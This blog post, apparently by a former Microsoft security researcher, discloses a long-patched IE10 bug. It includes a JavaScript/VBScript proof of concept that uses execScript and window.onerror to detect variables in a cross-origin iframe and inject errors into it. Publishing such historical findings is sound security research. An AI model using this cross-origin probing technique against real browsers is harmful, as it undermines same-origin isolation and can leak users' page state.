VBScript Cross-Origin Variable Existence Detection and Error Injection

With the help of VBScript’s execScript, it is possible to probe for the existence of named variables in a cross-origin iFrame. If the variable exists, the error fires only inside the iFrame’s Trident; if it does not exist, the error propagates to both Tridents — which can be detected from the parent’s window.onerror handler.

var DOES_NOT_EXIST = true;

window.onerror = function() {
    DOES_NOT_EXIST = false;
    return true;
}

function showResult() {
    alert("Variable " + document.all.varName.value + (DOES_NOT_EXIST ? " DOES " : " DOES NOT ") + "exist!");
    DOES_NOT_EXIST = true;
}

function main() {
    try {
        setTimeout("showResult()");
        execScript('iFrame.' + document.all.varName.value, 'VBScript');
    } catch(e) {}
}

Beyond the variable guessing, the ability to inject a JavaScript error into a foreign-origin frame is itself worth noting. I could not construct anything directly harmful from the error injection alone, but cross-origin error injection is a capability that should not be possible from a same-origin policy standpoint. Tested on Win8 IE10.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Address Bar Spoof via onreadystatechange and document.write] :: [IE10 UXSS: Sandbox Headers Paradox] >